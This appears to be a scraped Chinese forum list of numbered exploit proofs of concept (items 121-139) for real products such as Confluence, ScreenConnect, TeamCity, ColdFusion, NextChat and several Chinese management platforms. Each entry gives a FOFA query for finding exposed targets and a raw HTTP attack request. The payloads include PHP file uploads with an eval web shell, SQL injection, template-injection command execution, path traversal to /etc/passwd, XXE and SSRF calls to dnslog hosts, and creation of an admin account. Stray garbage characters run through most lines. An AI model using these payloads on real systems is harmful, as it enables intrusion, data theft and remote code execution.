5 B" X8 g8 V4 O6 g9 @FOFA:title="Smart管理平台"/ e7 J/ B' X* b4 w6 L& K- l* W
POST /useratte/web.php? HTTP/1.1
/ u% G2 m: ]# ]* @. sHost: ip:port) _6 `' }9 ~% J8 ~* m9 B. X2 i+ V) b
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
1 W) B' L( m1 G7 p$ G7 ?+ q% l* UUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko0 H+ a6 f8 \3 k# j0 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ s2 Z0 N% p1 ~4 J" C/ K/ K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) w0 I6 r* K4 x1 W5 Z- t2 ^Accept-Encoding: gzip, deflate4 n6 r8 P2 Y' s" q: D' e9 `
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328, l V9 x* \5 F9 M( `. \/ p
Content-Length: 597' `# k& w- y$ M
Origin: https://ip:port
: I! U3 g3 m6 V8 ~0 l8 R' d& ?7 @Referer: https://ip:port/sysmanage/licence.php
1 w* ]' V" a: S# f$ Y/ CUpgrade-Insecure-Requests: 1
B# }& P1 G7 r3 H1 BSec-Fetch-Dest: document
9 m# J S5 h9 [- g7 [2 OSec-Fetch-Mode: navigate
% J0 i2 n+ n6 a. a' hSec-Fetch-Site: same-origin4 `( ?) p3 N! i& b
Sec-Fetch-User: ?1* `# ?: n5 |# U% q7 }, G3 D i
Te: trailers
& z B5 p8 A9 a2 [: c8 C' v) wConnection: close* W4 P) ]0 I" ]
6 {* y+ J) ]% s0 @3 L-----------------------------42328904123665875270630079328
2 V8 n5 r) c4 Y' @1 V8 [5 HContent-Disposition: form-data; name="file_upload"; filename="2.php"
& K7 v: Q h% V- X) wContent-Type: application/octet-stream9 Z" s$ y3 i7 B5 ?; w8 t$ j. A
* V3 G5 |, Q' z<?php phpinfo()?>
" ^6 |' h u- A; z; c-----------------------------42328904123665875270630079328
- b3 D% Z; E: J$ l; `Content-Disposition: form-data; name="id_type"
/ N$ k% F9 V- x" U, ^
. S+ @+ S# |! v7 S0 L' R$ Z1. `0 S: w& @6 B1 m- W, h
-----------------------------42328904123665875270630079328
) m4 |+ j* d% sContent-Disposition: form-data; name="1_ck"& Y7 l) X1 H) s+ ]/ z" `
7 N7 t ? _5 y* |# ~4 j1_radhttp/ q8 ^ W1 u; \0 l+ ]
-----------------------------42328904123665875270630079328* f+ C5 M, F) F3 w3 D
Content-Disposition: form-data; name="mode"
7 s! @% [7 T- S! W. f
" p; k. S( H k! I& nimport4 w3 F( g; C# a( b: z5 R e
-----------------------------42328904123665875270630079328) r0 E* s8 }' W/ g! R4 l4 ]
$ e3 g! j" ?6 S: e% x' J* z0 k
9 |& ?* s& x; f, n6 Z1 M) y文件路径/upload/2.php) s: o/ ~' O: k" C$ [. }. j
6 L, i4 o5 W6 ~! R6 C
121. 北京百绰智能S42管理平台userattestation.php任意文件上传% Y7 \) W# F5 C" t2 q
CVE-2024-1918
& M' n) K2 V1 p2 t+ V$ Y/ ?% AFOFA:title="Smart管理平台"
+ U4 m% P0 j7 D4 q2 Q! kPOST /useratte/userattestation.php HTTP/1.1! D: Z9 G" h5 |0 o. E4 I5 z5 f8 ]
Host: 192.168.40.130:8443 }# N L2 ~: o2 t4 n
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac501 L* T3 L* E) ?( ?# r) R1 m" X: J% Q k
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko! v0 u3 i8 e4 Q2 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" j- e/ k. f' E4 X5 k5 X4 b7 RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: x& E( O u" V3 j: V, gAccept-Encoding: gzip, deflate# D1 k2 @) d9 C( u ~% v' s: q
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328/ [: \3 C2 z8 c7 K
Content-Length: 592+ | t% _! i# K% `
Origin: https://192.168.40.130:84435 f# \" k; W5 n( S
Upgrade-Insecure-Requests: 1
9 T5 \ b" E; w8 `! v, x) QSec-Fetch-Dest: document
' U! t; H1 T" R8 o" D3 y/ CSec-Fetch-Mode: navigate+ J6 u5 _( a) n1 m% e" p
Sec-Fetch-Site: same-origin& i! V, b, n( B# M' E/ ?$ n; E
Sec-Fetch-User: ?1
8 R' `# @7 ^0 |& J: {# P) m( ATe: trailers( L6 `: ^8 S) l, y
Connection: close& s1 k( `+ N' b
" D: f+ `5 Z* h9 ~1 [" h* @-----------------------------42328904123665875270630079328, Z6 o5 c0 p3 q8 h Q. a
Content-Disposition: form-data; name="web_img"; filename="1.php"
" |+ F3 |# @/ i- j/ XContent-Type: application/octet-stream
" A: n2 [, I7 |
2 `0 v( i# y! U- a5 F% e" }) C, v<?php phpinfo();?>6 H* t! ~" m2 a/ M8 d4 F( H% L
-----------------------------42328904123665875270630079328% h, j4 W: X7 ?7 k i% B
Content-Disposition: form-data; name="id_type"0 I: Z u1 r) d# I! ]5 ^4 P; k
+ P) h! O8 i; W" Z
1
# q2 W5 X" ~9 s" d( T7 w- {" g8 k2 m-----------------------------423289041236658752706300793284 P: M$ ]3 B3 ^7 D" A" h
Content-Disposition: form-data; name="1_ck"0 ~0 M( ~1 w8 r. w9 j; E1 @
/ h; G& @6 c6 y" t) u5 T) X
1_radhttp8 ]- D6 q5 D w
-----------------------------42328904123665875270630079328% m6 n: l- c; U- D' F
Content-Disposition: form-data; name="hidwel"3 o! C% c" m4 r5 K z+ ^' b! M* L7 x
T7 e. H. D4 m8 ]9 K
set1 g4 Z$ L, U- K' F! f f8 |! Z
-----------------------------42328904123665875270630079328
, {9 u$ {) f; S5 o8 h) g7 _
# z. y; x% w) X) s4 g# k
/ b5 I; V0 Z9 `# U' U2 l- h, I* Xboot/web/upload/weblogo/1.php% H( D0 A2 H' c" }* @
6 L! P) j4 Q( |" O122. 北京百绰智能s200管理平台/importexport.php sql注入! E( R1 u1 G. u3 E- m
CVE-2024-27718FOFA:title="Smart管理平台"
; D' z8 G+ R% d9 Y8 z其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
7 o6 z5 u+ L& _7 P* H" UGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
1 Q& Q5 O5 C; I4 n$ hHost: x.x.x.x
4 m& y4 ~+ q& P4 T- hCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
1 ~# N1 d# i/ B( a( k U7 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 e' }" G: u' m8 A) h1 h9 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, }% c' j9 |6 A7 D+ e/ I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* f e8 ~6 G G7 |$ n
Accept-Encoding: gzip, deflate, br
/ J0 L% H0 y7 @: JUpgrade-Insecure-Requests: 1* B9 t" L9 |9 ]3 G9 ?/ T% I+ ]) \3 j3 ~
Sec-Fetch-Dest: document) a/ r' \7 X8 v H6 v# n/ ?$ D7 l/ d- Z
Sec-Fetch-Mode: navigate9 @9 d! s3 `" V# {2 X) a
Sec-Fetch-Site: none+ S9 R! D$ H0 R0 a: j& b H
Sec-Fetch-User: ?1
, X6 v! t1 b: f1 DTe: trailers
- }% y$ Z, X2 s/ |5 qConnection: close% ~2 a5 z" `' W9 u
: C; T& F# h! T6 e3 Q. y: P6 V% l
+ I. o0 T8 }2 K# Q* r
123. Atlassian Confluence 模板注入代码执行
8 Q! ]) E; r$ [FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
3 K8 f3 n! B( B1 |' m+ _POST /template/aui/text-inline.vm HTTP/1.1
! J( y: u) f& S8 f, MHost: localhost:8090# f1 E) h9 a' Y$ f
Accept-Encoding: gzip, deflate, br1 B! V9 _- r' g8 B# A
Accept: */*+ c# }! g/ G0 I; D5 W/ `. q
Accept-Language: en-US;q=0.9,en;q=0.8
# Q4 N; B* A* ^' z( V1 a5 ~: U5 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
. T& y/ w) k! C. g5 AConnection: close
/ k8 ^# X) g; w$ YContent-Type: application/x-www-form-urlencoded0 o7 b8 I4 E; I- s
8 K$ |4 X2 P' elabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))1 A' ^/ ], [' V9 w5 r
; D% d0 R t( ~
8 c# h% U6 z- n2 h: {124. 湖南建研工程质量检测系统任意文件上传9 l3 e) A" C; M
FOFA:body="/Content/Theme/Standard/webSite/login.css"
5 h7 \0 m2 \7 n1 \POST /Scripts/admintool?type=updatefile HTTP/1.12 |* d! d( ] L, y
Host: 192.168.40.130:8282
: z* A8 a5 P5 m- {( h LUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.364 @; \8 w, |# `' y& f ?
Content-Length: 726 ~# b# |+ R9 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.88 T: @$ g' Z4 w7 w/ a. z) ^
Accept-Encoding: gzip, deflate, br
3 @: i# r4 c6 T' S* w8 PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: R7 ]7 O* c/ i: e( x$ F- N$ H, zConnection: close( ]" m% n# ^+ B c6 M* K4 }# c
Content-Type: application/x-www-form-urlencoded! `1 @' Z. ~0 Z6 Y! |
. `0 F* A9 L: ]: ]% E) f+ Z; b
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%># U4 v9 h4 _0 G- H5 Z
0 Q- V: | }- Z7 U: u# X9 p9 Z; v$ F% W; X' k# j% ~/ Q
http://192.168.40.130:8282/Scripts/abcgcg.aspx
' b, X7 Q4 j, ?( O
5 f. {& L5 |' s2 E; v9 u125. ConnectWise ScreenConnect身份验证绕过, l6 _ y( |7 K- @9 N9 ~
CVE-2024-1709
8 i7 P/ m, \4 }8 G% R+ Z I" [FOFA:icon_hash="-82958153"" H+ G2 I7 `7 U! l# b k8 O9 c8 y6 p6 K
https://github.com/watchtowrlabs ... bypass-add-user-poc0 V) I v& O2 J9 Y" q
' X8 v E; ?+ g( f' b4 E' [7 Y7 R
& T) g: |% o% P使用方法
( G5 k& d' P1 D# N3 z/ Bpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
- H$ U2 R+ X4 h) m8 w" c& k8 I' |" T
1 Z) u1 M c$ s/ P5 v创建好用户后直接登录后台,可以执行系统命令。; y7 y/ `7 o" @$ p, L: R
: E V8 V( o1 \- N2 |7 _8 W1 u9 _
126. Aiohttp 路径遍历* s$ c' O5 \2 S
FOFA:title=="ComfyUI"
- [* E' ^: n- N- T/ [. l7 e$ Y0 dGET /static/../../../../../etc/passwd HTTP/1.1
/ @4 g& T! ^0 {2 i( eHost: x.x.x.x! Y! h7 o$ Q4 V$ Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' c) G+ S1 R5 C) B$ D* K5 V
Connection: close2 r( E9 f; N$ \& e
Accept: */*3 r* q# y$ |5 s! X- B
Accept-Language: en
' w& x8 i0 m+ b* o/ O% VAccept-Encoding: gzip& ]+ @1 q4 G! [! |; n2 D
# Z g& O3 D l
0 ]9 ^- m6 [2 |! p6 |$ S3 P' t
127. 广联达Linkworks DataExchange.ashx XXE1 Q: Z" G4 }% @( G+ d2 v( K
FOFA:body="Services/Identification/login.ashx"
! U# J( E5 \8 c3 ePOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1- g$ E: ^8 c/ @ j
Host: 192.168.40.130:8888" I. Z5 d2 Z1 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
g+ k& x- W5 l2 T8 h1 uContent-Length: 415
0 d/ V8 w: g: ~2 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. s( S) }. h2 @3 ]3 XAccept-Encoding: gzip, deflate
0 e' M6 }3 [3 ]. c2 t( Z7 {Accept-Language: zh-CN,zh;q=0.9+ @8 @$ f1 G1 I8 O4 F) l* r
Connection: close+ x* o w4 X+ M& p# {' O% ?3 U
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
3 x- R( V+ ^9 b$ sPurpose: prefetch
+ P$ N) ~. L8 L4 o1 i- a6 cSec-Purpose: prefetch;prerender4 M# Q0 U$ ]' x- \) s# s- a3 H
I' ~, h" O; `
------WebKitFormBoundaryJGgV5l5ta05yAIe04 b7 I' w* i9 L, K* A
Content-Disposition: form-data;name="SystemName"
% [ I) o' m& Y) L0 n' ^& `+ p% v9 X2 G" K
BIM. q/ K/ u5 Z! M% H: M7 U3 {
------WebKitFormBoundaryJGgV5l5ta05yAIe0
- L( B$ b8 o- b" S/ t9 tContent-Disposition: form-data;name="Params"
: R0 g( |5 j7 @Content-Type: text/plain/ k/ t" i4 y, P; E
2 ~4 r+ R! x3 j5 z3 @
<?xml version="1.0" encoding="UTF-8"?>
5 ]! L# m9 _' S7 a) D& T7 N" u<!DOCTYPE test [
; c O- ?/ K; t, k2 i. r1 m& H<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
/ h! Y. E0 n9 Q0 c* G]9 Q- u/ `/ S2 ~
>" N- O0 P ?0 U; f
<test>&t;</test>
6 b. E4 u* I Y u/ o; N0 i4 u------WebKitFormBoundaryJGgV5l5ta05yAIe0-- z# M* w$ I) L; U
* B' x. q7 V8 d: Q
- |) ]4 k+ ?$ m1 U3 s* S' z
! J: m4 a- |+ f0 a6 w) j0 L$ e128. Adobe ColdFusion 反序列化( C9 j6 V) Z( J/ ? N/ \! e
CVE-2023-38203
: i; ~. ?( A. iAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)' G; m9 A; e1 n
FOFA:app="Adobe-ColdFusion"7 @" p( t& H$ _, N/ [1 a
PAYLOAD
# H j2 G5 y- H( ~( K- @
% o) K% h/ L X. r$ Y129. Adobe ColdFusion 任意文件读取; N% |9 e* g- |0 B( M
CVE-2024-20767
$ P" _: J& w6 M5 l: }, hFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"( d& r1 x' N2 P' y% k
第一步,获取uuid
( j# I* v# x1 G- ~9 e) UGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
( y3 i4 Y0 l/ _9 e3 bHost: x.x.x.x
# s; D6 ?- c0 I3 V4 b9 B$ W. }3 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 m% t4 H- K0 W+ {2 w. V; E3 Z3 EAccept: */*
! z# z8 p5 y+ J+ b: D2 V4 \' a3 {Accept-Encoding: gzip, deflate
1 d* T4 r5 P% I/ ^0 SConnection: close
+ I0 ]) k' w2 q; u
( N( G0 \% R& r! `5 I5 S# j7 a. N) }7 H0 F
第二步,读取/etc/passwd文件
, g$ q) y2 n$ ~2 [- U; mGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
f( ^4 r$ m/ b9 v+ k7 x% [4 pHost: x.x.x.x }. w; H6 f8 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 G& c. a0 |' w9 R5 H; jAccept: */*( \9 w5 Z% [8 Z/ T: t7 R1 ~
Accept-Encoding: gzip, deflate
5 O# t- c, V# T) T: O" OConnection: close
' G8 r& b+ \& c0 S0 u' _uuid: 85f60018-a654-4410-a783-f81cbd5000b91 Q6 y" B7 V3 |
! r' J4 F% _% `$ T/ D+ c) f7 L0 Z! V0 ~/ V) }6 S1 \& ^/ n/ F
130. Laykefu客服系统任意文件上传1 h% Z8 n! _, h6 Y: U
FOFA:icon_hash="-334624619"9 v+ _. c, \" I
POST /admin/users/upavatar.html HTTP/1.1: ~% E, w$ c' J
Host: 127.0.0.1
. |7 Z# @9 H9 U2 N4 G4 `' ~& @Accept: application/json, text/javascript, */*; q=0.01) ]- E4 I& a: z. b& ~
X-Requested-With: XMLHttpRequest
; ?7 `" B8 T8 {, lUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" E, [/ x$ v+ p4 I# J
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
% k% B$ s' C" {# O: |Accept-Encoding: gzip, deflate
" ?* S4 }$ n& x" bAccept-Language: zh-CN,zh;q=0.9
; E& X+ f: ^9 pCookie: user_name=1; user_id=36 D$ C8 m+ g( N3 N
Connection: close
$ _4 m! M6 Z, ]5 B. Q. [% J
6 w& {0 K7 z* ]% C+ r( ?------WebKitFormBoundary3OCVBiwBVsNuB2kR; ~% e! M; u* ?" _/ J
Content-Disposition: form-data; name="file"; filename="1.php"8 V, I+ @- [3 _2 F! T3 h
Content-Type: image/png; y9 ^- L% i, a2 Z O4 n l% n6 ?
, }" F: Y) x" v" W
<?php phpinfo();@eval($_POST['sec']);?>+ o& {0 ]4 u4 E0 f, v
------WebKitFormBoundary3OCVBiwBVsNuB2kR--4 z- s- D0 Q g+ j; m s! ?7 L4 j
1 z3 y' A, t$ K) z
% a1 I4 p3 `. R/ E1 @/ V) A3 _131. Mini-Tmall <=20231017 SQL注入4 @6 g0 n% g: A0 s" m
FOFA:icon_hash="-2087517259"9 U& y9 [" x }' b5 Y+ T7 [1 [# ?: i
后台地址:http://localhost:8080/tmall/admin
5 M! b3 b# P6 V. shttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)0 |6 \: f6 ]" v0 b" u$ l
9 h# V5 \1 ^9 \" T+ L6 \5 T
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过; J1 _: v5 c( Y. ^( \
CVE-2024-27198- O0 v1 e& K6 \! H8 M
FOFA:body="Log in to TeamCity"9 K0 ^# _" `1 T
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
1 D* \( \8 C6 \6 l# n$ J9 C" RHost: 192.168.40.130:8111, f! E7 L. K% z f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& U2 X5 Q9 V% } _- Z) U& qAccept: */*
" x8 q, k6 r/ q! h$ L. J/ U* DContent-Type: application/json! V3 l. f' Z/ p/ w3 W! J& b
Accept-Encoding: gzip, deflate
0 { y7 {/ V0 C9 j: h( @: u# }+ P: E6 h3 R6 q; M" }* E
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}' G+ Q8 Z+ w" j* \8 t/ ~ h
, _% v$ Y6 O% P( J
% l: @8 @2 q0 I" R9 z5 vCVE-2024-27199
% H+ M h. G& F( C9 j/res/../admin/diagnostic.jsp
5 z+ q! N' u+ u; o8 z/.well-known/acme-challenge/../../admin/diagnostic.jsp
7 b U8 t3 ?: n, v2 V9 G/update/../admin/diagnostic.jsp
7 T* w" S* c; s2 I/ B. g" R( n% k" o# h- f
" s- g# x- ] |5 }
CVE-2024-27198-RCE.py' ?6 N! R4 f( N
4 ]( X7 o$ ^5 _' e' z
133. H5 云商城 file.php 文件上传
6 v3 ]" Y i6 J r- w; ?' pFOFA:body="/public/qbsp.php"
' n5 g; j3 x) P9 |) h- HPOST /admin/commodtiy/file.php?upload=1 HTTP/1.12 W( m$ N; S- q! Q' r- H
Host: your-ip( C" h( k6 ?5 z6 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# c M# H; a7 k' f- h1 Y& ~Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx: O& `+ }0 S8 I
5 |4 z. P1 |" [ B* H! X( i/ ~------WebKitFormBoundaryFQqYtrIWb8iBxUCx
* J/ l. y) _2 W- e" j# jContent-Disposition: form-data; name="file"; filename="rce.php"4 u% w- l4 L+ H* J8 n
Content-Type: application/octet-stream4 C* q+ b6 s, s3 H5 M
1 t, k' ~* G* j% I R; z<?php system("cat /etc/passwd");unlink(__FILE__);?>/ Z5 x! L! f4 `
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
1 h5 p1 F. {8 ~% |
0 L6 E" |+ Y$ b8 R. V
3 E' b+ `$ X& U2 Y. E: q e, i( J( x1 a5 C1 V: U0 Z# i2 a+ @8 T" B
134. 网康NS-ASG应用安全网关index.php sql注入3 h4 N! r; }! t% I% Y8 r
CVE-2024-2330: K9 C+ s, ^- M; w; \9 R
Netentsec NS-ASG Application Security Gateway 6.3版本
1 L/ y Z, f# BFOFA:app="网康科技-NS-ASG安全网关") @1 A C% U$ P
POST /protocol/index.php HTTP/1.1( t7 }" r! }: F2 S% B
Host: x.x.x.x
" W1 p5 k0 g; @+ j- R% |; c8 t2 E0 J ^Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de2 t" o8 \) s* `0 i) G. }7 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0: F6 Z0 k) Q* o$ H/ n
Accept: */*) ?& D. R, c: R% F a/ j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 W' M) o7 @: M4 fAccept-Encoding: gzip, deflate
* l' b% ~" E6 n- o* xSec-Fetch-Dest: empty
1 z! \; b: ~- I2 u% H, k+ G* }2 gSec-Fetch-Mode: cors- X- s; k8 W1 @- K+ Y) \
Sec-Fetch-Site: same-origin7 l6 A6 \: g& I% l9 x. {
Te: trailers
/ |2 _# x. w+ Y4 T' ZConnection: close+ I/ [/ }+ z( x% K- S! f6 B
Content-Type: application/x-www-form-urlencoded
# T; P [0 Z, n5 x3 n0 ~& rContent-Length: 2636 [$ O1 ^+ M* {2 g# r( n$ s$ c
0 p0 W9 o2 z$ E9 `$ w O& ~. u' Q2 Pjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
2 S8 p) B7 V! ~8 ?3 y3 t% Z5 N
% F) S& s$ `' C+ j
4 U9 k1 G% B" o- P5 H- C# s135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
8 p, S- ]& `) J% f/ ZCVE-2024-2022
2 H+ e$ ]8 a9 f2 XNetentsec NS-ASG Application Security Gateway 6.3版本
% Y3 S3 U! Q/ @8 Q C8 \% A, `FOFA:app="网康科技-NS-ASG安全网关"
( L$ f4 Q2 a: h }4 tGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
) w' c5 G2 k- C) l- e( pHost: x.x.x.x
0 X+ s+ I2 x. d0 L0 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 g! {7 |" k0 z2 i- u& n; Y7 L) [& AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ {+ a# Z2 R6 }; z% WAccept-Encoding: gzip, deflate
0 \7 p: J" h: _9 E7 bAccept-Language: zh-CN,zh;q=0.9
' t3 T6 c5 l0 s8 g# `Connection: close3 b7 {$ v7 u/ j4 m7 J
4 D5 b" ?+ ]* r' l4 B/ j2 _ a5 X& N$ U. _
136. NextChat cors SSRF
! z/ Z, x; J" z( Q2 j; V+ K/ BCVE-2023-49785( t5 ?$ H8 f& U; S. Y' I
FOFA:title="NextChat"; t! |* P- U6 h2 Y/ s' P1 g
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
, f/ Z/ Z" _+ l# f" V3 y1 SHost: x.x.x.x:10000' k; B: B+ i7 f) h8 A1 ^5 s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 f6 y: J% z2 q3 o$ |9 r
Connection: close
, S; [- S, n' Z$ ?8 P+ d: j0 cAccept: */*1 i; q0 B& Z0 o4 Z+ i
Accept-Language: en
1 r9 e$ @8 o' N* o6 ? ^+ ^9 |" y+ ~Accept-Encoding: gzip; S1 ?+ U" L: Y8 \. A
q: q1 g# V6 i: ?) Y! V
0 k5 ?4 ]2 V/ |/ H; ?$ R& ?/ o0 }
137. 福建科立迅通信指挥调度平台down_file.php sql注入. d/ X" N4 \/ R7 u# r6 z" ?
CVE-2024-26200 {1 V8 M3 _1 t8 b# q. Q
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
9 W. Q% z: M2 ]3 W1 `. P# }3 s1 `GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
& F7 [6 O+ i8 T4 [! O0 E* eHost: x.x.x.x
) ~8 L+ ]$ ~/ _/ I ?, IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
p, n. h: q4 Q$ O8 X% Z4 H6 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, V+ Z4 z# s% a# T( X" sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. @, f7 ?) R7 j8 H8 y
Accept-Encoding: gzip, deflate, br9 ^6 G, R" t, C6 m6 M
Connection: close
u8 ?$ ]" k3 Y, Y) u2 t! xCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj3 ^+ P6 V" i& |# I
Upgrade-Insecure-Requests: 1% g3 R/ U. j3 f! B$ J w
8 M% \9 u* i8 n* W& o( ^$ x: d3 ?+ h7 ]* I
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
& ?, K' U- M8 F' I) s* y& PCVE-2024-2621$ {6 A4 P$ _$ v5 y5 G
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"$ P1 k$ v) i; X
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.18 J: j1 `% e0 S' F4 X# b
Host: x.x.x.x
/ L$ S( ?6 p1 m8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; r8 E/ r: M/ ~, v& Z9 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' [. p+ M5 `% s' {& o4 r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 i7 E7 s5 W' g
Accept-Encoding: gzip, deflate, br
9 O+ k! s0 ?0 @& [Connection: close
2 ]5 A# a) z( ~) nUpgrade-Insecure-Requests: 16 X; M: x+ h7 {* z
2 v2 I# L3 }9 C6 a( z! {6 \" w
; ^! M& |; R* N# r5 \3 ^139. 福建科立讯通信指挥调度平台editemedia.php sql注入
' ]# {; O( J: O# JCVE-2024-2622# j5 v+ k8 g+ P8 g( F
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"% O3 I$ R' q/ P8 ?1 C/ B
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1" Z7 _. Y. _1 ^% s% u
Host: x.x.x.x
+ v* p# p- s j- @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
